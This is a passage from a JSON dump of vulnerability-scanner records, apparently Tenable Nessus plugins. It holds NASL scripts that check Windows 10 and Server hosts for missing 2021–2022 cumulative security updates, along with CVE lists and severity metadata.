script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005030: Windows 10 Version 1809 and Windows Server 2019 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005030.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34530, CVE-2021-34533,\n CVE-2021-34534, CVE-2021-34535, CVE-2021-36936,\n CVE-2021-36937, CVE-2021-36947)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483,\n CVE-2021-34484, CVE-2021-34486, CVE-2021-34487,\n CVE-2021-34536, CVE-2021-34537, CVE-2021-36948)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933, CVE-2021-36938)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005030-os-build-17763-2114-cec503ed-cc09-4641-bdc1-988153e0bd9a\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?34b43ea5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005030.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005030'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:17763,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005030])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:40:12", "description": "The remote Windows host is missing security update 5009546.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21849, CVE-2022-21850, CVE-2022-21851, CVE-2022-21874, CVE-2022-21878, CVE-2022-21892, CVE-2022-21893, CVE-2022-21922, CVE-2022-21928, CVE-2022-21958, CVE-2022-21959, CVE-2022-21960, CVE-2022-21961, CVE-2022-21962, CVE-2022-21963)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-21876, CVE-2022-21880, CVE-2022-21904, CVE-2022-21915)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21900, CVE-2022-21905, CVE-2022-21913, CVE-2022-21924, CVE-2022-21925)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2022-21836)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-21843, CVE-2022-21848, CVE-2022-21883, CVE-2022-21889, CVE-2022-21890)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835, CVE-2022-21838, CVE-2022-21857, CVE-2022-21859, CVE-2022-21860, CVE-2022-21862, CVE-2022-21863, CVE-2022-21864, CVE-2022-21866, CVE-2022-21867, CVE-2022-21868, CVE-2022-21870, CVE-2022-21871, CVE-2022-21873, CVE-2022-21875, CVE-2022-21879, CVE-2022-21881, CVE-2022-21884, CVE-2022-21885, CVE-2022-21895, CVE-2022-21897, CVE-2022-21901, CVE-2022-21902, CVE-2022-21903, CVE-2022-21908, CVE-2022-21910, CVE-2022-21914, CVE-2022-21916, CVE-2022-21919, CVE-2022-21920)", "cvss3": {}, "published": "2022-01-11T00:00:00", "type": "nessus", "title": "KB5009546: Windows 10 Version 1607 and Windows Server 2016 Security Update (January 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21833", "CVE-2022-21834", "CVE-2022-21835", "CVE-2022-21836", "CVE-2022-21838", "CVE-2022-21843", "CVE-2022-21848", "CVE-2022-21849", "CVE-2022-21850", "CVE-2022-21851", "CVE-2022-21857", "CVE-2022-21859", "CVE-2022-21860", "CVE-2022-21862", "CVE-2022-21863", "CVE-2022-21864", "CVE-2022-21866", "CVE-2022-21867", "CVE-2022-21868", "CVE-2022-21870", "CVE-2022-21871", "CVE-2022-21873", "CVE-2022-21874", "CVE-2022-21875", "CVE-2022-21876", "CVE-2022-21878", "CVE-2022-21879", "CVE-2022-21880", "CVE-2022-21881", "CVE-2022-21883", "CVE-2022-21884", "CVE-2022-21885", "CVE-2022-21889", "CVE-2022-21890", "CVE-2022-21892", "CVE-2022-21893", "CVE-2022-21894", "CVE-2022-21895", "CVE-2022-21897", "CVE-2022-21900", "CVE-2022-21901", "CVE-2022-21902", "CVE-2022-21903", "CVE-2022-21904", "CVE-2022-21905", "CVE-2022-21908", "CVE-2022-21910", "CVE-2022-21911", "CVE-2022-21913", "CVE-2022-21914", "CVE-2022-21915", "CVE-2022-21916", "CVE-2022-21919", "CVE-2022-21920", "CVE-2022-21922", "CVE-2022-21924", "CVE-2022-21925", "CVE-2022-21928", "CVE-2022-21958", "CVE-2022-21959", "CVE-2022-21960", "CVE-2022-21961", "CVE-2022-21962", "CVE-2022-21963", "CVE-2022-21964"], "modified": "2022-04-26T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JAN_5009546.NASL", "href": "https://www.tenable.com/plugins/nessus/156619", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156619);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/26\");\n\n script_cve_id(\n \"CVE-2022-21833\",\n \"CVE-2022-21834\",\n \"CVE-2022-21835\",\n \"CVE-2022-21836\",\n \"CVE-2022-21838\",\n \"CVE-2022-21843\",\n \"CVE-2022-21848\",\n \"CVE-2022-21849\",\n \"CVE-2022-21850\",\n \"CVE-2022-21851\",\n \"CVE-2022-21857\",\n \"CVE-2022-21859\",\n \"CVE-2022-21860\",\n \"CVE-2022-21862\",\n \"CVE-2022-21863\",\n \"CVE-2022-21864\",\n \"CVE-2022-21866\",\n \"CVE-2022-21867\",\n \"CVE-2022-21868\",\n \"CVE-2022-21870\",\n \"CVE-2022-21871\",\n \"CVE-2022-21873\",\n \"CVE-2022-21874\",\n \"CVE-2022-21875\",\n \"CVE-2022-21876\",\n \"CVE-2022-21878\",\n \"CVE-2022-21879\",\n \"CVE-2022-21880\",\n \"CVE-2022-21881\",\n \"CVE-2022-21883\",\n \"CVE-2022-21884\",\n \"CVE-2022-21885\",\n \"CVE-2022-21889\",\n \"CVE-2022-21890\",\n \"CVE-2022-21892\",\n \"CVE-2022-21893\",\n \"CVE-2022-21894\",\n \"CVE-2022-21895\",\n \"CVE-2022-21897\",\n \"CVE-2022-21900\",\n \"CVE-2022-21901\",\n \"CVE-2022-21902\",\n \"CVE-2022-21903\",\n \"CVE-2022-21904\",\n \"CVE-2022-21905\",\n \"CVE-2022-21908\",\n \"CVE-2022-21910\",\n \"CVE-2022-21911\",\n \"CVE-2022-21913\",\n \"CVE-2022-21914\",\n \"CVE-2022-21915\",\n \"CVE-2022-21916\",\n \"CVE-2022-21919\",\n \"CVE-2022-21920\",\n \"CVE-2022-21922\",\n \"CVE-2022-21924\",\n \"CVE-2022-21925\",\n \"CVE-2022-21928\",\n \"CVE-2022-21958\",\n \"CVE-2022-21959\",\n \"CVE-2022-21960\",\n \"CVE-2022-21961\",\n \"CVE-2022-21962\",\n \"CVE-2022-21963\",\n \"CVE-2022-21964\"\n );\n script_xref(name:\"MSKB\", value:\"5009546\");\n script_xref(name:\"MSFT\", value:\"MS22-5009546\");\n script_xref(name:\"IAVA\", value:\"2022-A-0012-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0016-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5009546: Windows 10 Version 1607 and Windows Server 2016 Security Update (January 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5009546.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-21849,\n CVE-2022-21850, CVE-2022-21851, CVE-2022-21874,\n CVE-2022-21878, CVE-2022-21892, CVE-2022-21893,\n CVE-2022-21922, CVE-2022-21928, CVE-2022-21958,\n CVE-2022-21959, CVE-2022-21960, CVE-2022-21961,\n CVE-2022-21962, CVE-2022-21963)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-21876, CVE-2022-21880,\n CVE-2022-21904, CVE-2022-21915)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21900, CVE-2022-21905,\n CVE-2022-21913, CVE-2022-21924, CVE-2022-21925)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2022-21836)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-21843,\n CVE-2022-21848, CVE-2022-21883, CVE-2022-21889,\n CVE-2022-21890)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835,\n CVE-2022-21838, CVE-2022-21857, CVE-2022-21859,\n CVE-2022-21860, CVE-2022-21862, CVE-2022-21863,\n CVE-2022-21864, CVE-2022-21866, CVE-2022-21867,\n CVE-2022-21868, CVE-2022-21870, CVE-2022-21871,\n CVE-2022-21873, CVE-2022-21875, CVE-2022-21879,\n CVE-2022-21881, CVE-2022-21884, CVE-2022-21885,\n CVE-2022-21895, CVE-2022-21897, CVE-2022-21901,\n CVE-2022-21902, CVE-2022-21903, CVE-2022-21908,\n CVE-2022-21910, CVE-2022-21914, CVE-2022-21916,\n CVE-2022-21919, CVE-2022-21920)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5009546\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5009546.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-21874\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS22-01\";\nkbs = make_list('5009546');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'14393',\n rollup_date:'01_2022',\n bulletin:bulletin,\n rollup_kb_list:[5009546])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:13:37", "description": "The remote Windows host is missing security update 5009557.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2022-21836)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-21839, CVE-2022-21843, CVE-2022-21847, CVE-2022-21848, CVE-2022-21883, CVE-2022-21889, CVE-2022-21890, CVE-2022-21918)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-21876, CVE-2022-21877, CVE-2022-21880, CVE-2022-21904, CVE-2022-21915)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21849, CVE-2022-21850, CVE-2022-21851, CVE-2022-21874, CVE-2022-21878, CVE-2022-21888, CVE-2022-21892, CVE-2022-21893, CVE-2022-21898, CVE-2022-21907, CVE-2022-21912, CVE-2022-21922, CVE-2022-21928, CVE-2022-21958, CVE-2022-21959, CVE-2022-21960, CVE-2022-21961, CVE-2022-21962, CVE-2022-21963)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835, CVE-2022-21838, CVE-2022-21852, CVE-2022-21857, CVE-2022-21858, CVE-2022-21859, CVE-2022-21860, CVE-2022-21861, CVE-2022-21862, CVE-2022-21863, CVE-2022-21864, CVE-2022-21865, CVE-2022-21866, CVE-2022-21867, CVE-2022-21868, CVE-2022-21869, CVE-2022-21870, CVE-2022-21871, CVE-2022-21872, CVE-2022-21873, CVE-2022-21875, CVE-2022-21879, CVE-2022-21881, CVE-2022-21882, CVE-2022-21884, CVE-2022-21885, CVE-2022-21895, CVE-2022-21896, CVE-2022-21897, CVE-2022-21901, CVE-2022-21902, CVE-2022-21903, CVE-2022-21908, CVE-2022-21910, CVE-2022-21914, CVE-2022-21916, CVE-2022-21919, CVE-2022-21920)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21900, CVE-2022-21905, CVE-2022-21906, CVE-2022-21913, CVE-2022-21924, CVE-2022-21925)", "cvss3": {}, "published": "2022-01-11T00:00:00", "type": "nessus", "title": "KB5009557: Windows 10 Version 1809 and Windows Server 2019 Security Update (January 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-22947", "CVE-2021-36976", "CVE-2022-21833", "CVE-2022-21834", "CVE-2022-21835", "CVE-2022-21836", "CVE-2022-21838", "CVE-2022-21839", "CVE-2022-21843", "CVE-2022-21847", "CVE-2022-21848", "CVE-2022-21849", "CVE-2022-21850", "CVE-2022-21851", "CVE-2022-21852", "CVE-2022-21857", "CVE-2022-21858", "CVE-2022-21859", "CVE-2022-21860", "CVE-2022-21861", "CVE-2022-21862", "CVE-2022-21863", "CVE-2022-21864", "CVE-2022-21865", "CVE-2022-21866", "CVE-2022-21867", "CVE-2022-21868", "CVE-2022-21869", "CVE-2022-21870", "CVE-2022-21871", "CVE-2022-21872", "CVE-2022-21873", "CVE-2022-21874", "CVE-2022-21875", "CVE-2022-21876", "CVE-2022-21877", "CVE-2022-21878", "CVE-2022-21879", "CVE-2022-21880", "CVE-2022-21881", "CVE-2022-21882", "CVE-2022-21883", "CVE-2022-21884", "CVE-2022-21885", "CVE-2022-21888", "CVE-2022-21889", "CVE-2022-21890", "CVE-2022-21892", "CVE-2022-21893", "CVE-2022-21894", "CVE-2022-21895", "CVE-2022-21896", "CVE-2022-21897", "CVE-2022-21898", "CVE-2022-21900", "CVE-2022-21901", "CVE-2022-21902", "CVE-2022-21903", "CVE-2022-21904", "CVE-2022-21905", "CVE-2022-21906", "CVE-2022-21907", "CVE-2022-21908", "CVE-2022-21910", "CVE-2022-21912", "CVE-2022-21913", "CVE-2022-21914", "CVE-2022-21915", "CVE-2022-21916", "CVE-2022-21918", "CVE-2022-21919", "CVE-2022-21920", "CVE-2022-21922", "CVE-2022-21924", "CVE-2022-21925", "CVE-2022-21928", "CVE-2022-21958", "CVE-2022-21959", "CVE-2022-21960", "CVE-2022-21961", "CVE-2022-21962", "CVE-2022-21963"], "modified": "2023-01-17T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JAN_5009557.NASL", "href": "https://www.tenable.com/plugins/nessus/156621", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc. \n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156621);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\n \"CVE-2021-22947\",\n \"CVE-2021-36976\",\n \"CVE-2022-21833\",\n \"CVE-2022-21834\",\n \"CVE-2022-21835\",\n \"CVE-2022-21836\",\n \"CVE-2022-21838\",\n \"CVE-2022-21839\",\n \"CVE-2022-21843\",\n \"CVE-2022-21847\",\n \"CVE-2022-21848\",\n \"CVE-2022-21849\",\n \"CVE-2022-21850\",\n \"CVE-2022-21851\",\n \"CVE-2022-21852\",\n \"CVE-2022-21857\",\n \"CVE-2022-21858\",\n \"CVE-2022-21859\",\n \"CVE-2022-21860\",\n \"CVE-2022-21861\",\n \"CVE-2022-21862\",\n \"CVE-2022-21863\",\n \"CVE-2022-21864\",\n \"CVE-2022-21865\",\n \"CVE-2022-21866\",\n \"CVE-2022-21867\",\n \"CVE-2022-21868\",\n \"CVE-2022-21869\",\n \"CVE-2022-21870\",\n \"CVE-2022-21871\",\n \"CVE-2022-21872\",\n \"CVE-2022-21873\",\n \"CVE-2022-21874\",\n \"CVE-2022-21875\",\n \"CVE-2022-21876\",\n \"CVE-2022-21877\",\n \"CVE-2022-21878\",\n \"CVE-2022-21879\",\n \"CVE-2022-21880\",\n \"CVE-2022-21881\",\n \"CVE-2022-21882\",\n \"CVE-2022-21883\",\n \"CVE-2022-21884\",\n \"CVE-2022-21885\",\n \"CVE-2022-21888\",\n \"CVE-2022-21889\",\n \"CVE-2022-21890\",\n \"CVE-2022-21892\",\n \"CVE-2022-21893\",\n \"CVE-2022-21894\",\n \"CVE-2022-21895\",\n \"CVE-2022-21896\",\n \"CVE-2022-21897\",\n \"CVE-2022-21898\",\n \"CVE-2022-21900\",\n \"CVE-2022-21901\",\n \"CVE-2022-21902\",\n \"CVE-2022-21903\",\n \"CVE-2022-21904\",\n \"CVE-2022-21905\",\n \"CVE-2022-21906\",\n \"CVE-2022-21907\",\n \"CVE-2022-21908\",\n \"CVE-2022-21910\",\n \"CVE-2022-21912\",\n \"CVE-2022-21913\",\n \"CVE-2022-21914\",\n \"CVE-2022-21915\",\n \"CVE-2022-21916\",\n \"CVE-2022-21918\",\n \"CVE-2022-21919\",\n \"CVE-2022-21920\",\n \"CVE-2022-21922\",\n \"CVE-2022-21924\",\n \"CVE-2022-21925\",\n \"CVE-2022-21928\",\n \"CVE-2022-21958\",\n \"CVE-2022-21959\",\n \"CVE-2022-21960\",\n \"CVE-2022-21961\",\n \"CVE-2022-21962\",\n \"CVE-2022-21963\"\n );\n script_xref(name:\"MSKB\", value:\"5009557\");\n script_xref(name:\"MSFT\", value:\"MS22-5009557\");\n script_xref(name:\"IAVA\", value:\"2022-A-0012-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0016-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/02/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0001\");\n\n script_name(english:\"KB5009557: Windows 10 Version 1809 and Windows Server 2019 Security Update (January 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5009557.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2022-21836)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-21839,\n CVE-2022-21843, CVE-2022-21847, CVE-2022-21848,\n CVE-2022-21883, CVE-2022-21889, CVE-2022-21890,\n CVE-2022-21918)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-21876, CVE-2022-21877,\n CVE-2022-21880, CVE-2022-21904, CVE-2022-21915)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-21849,\n CVE-2022-21850, CVE-2022-21851, CVE-2022-21874,\n CVE-2022-21878, CVE-2022-21888, CVE-2022-21892,\n CVE-2022-21893, CVE-2022-21898, CVE-2022-21907,\n CVE-2022-21912, CVE-2022-21922, CVE-2022-21928,\n CVE-2022-21958, CVE-2022-21959, CVE-2022-21960,\n CVE-2022-21961, CVE-2022-21962, CVE-2022-21963)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835,\n CVE-2022-21838, CVE-2022-21852, CVE-2022-21857,\n CVE-2022-21858, CVE-2022-21859, CVE-2022-21860,\n CVE-2022-21861, CVE-2022-21862, CVE-2022-21863,\n CVE-2022-21864, CVE-2022-21865, CVE-2022-21866,\n CVE-2022-21867, CVE-2022-21868, CVE-2022-21869,\n CVE-2022-21870, CVE-2022-21871, CVE-2022-21872,\n CVE-2022-21873, CVE-2022-21875, CVE-2022-21879,\n CVE-2022-21881, CVE-2022-21882, CVE-2022-21884,\n CVE-2022-21885, CVE-2022-21895, CVE-2022-21896,\n CVE-2022-21897, CVE-2022-21901, CVE-2022-21902,\n CVE-2022-21903, CVE-2022-21908, CVE-2022-21910,\n CVE-2022-21914, CVE-2022-21916, CVE-2022-21919,\n CVE-2022-21920)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21900, CVE-2022-21905,\n CVE-2022-21906, CVE-2022-21913, CVE-2022-21924,\n CVE-2022-21925)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5009557\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5009557.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-21907\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS22-01\";\nkbs = make_list('5009557');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) 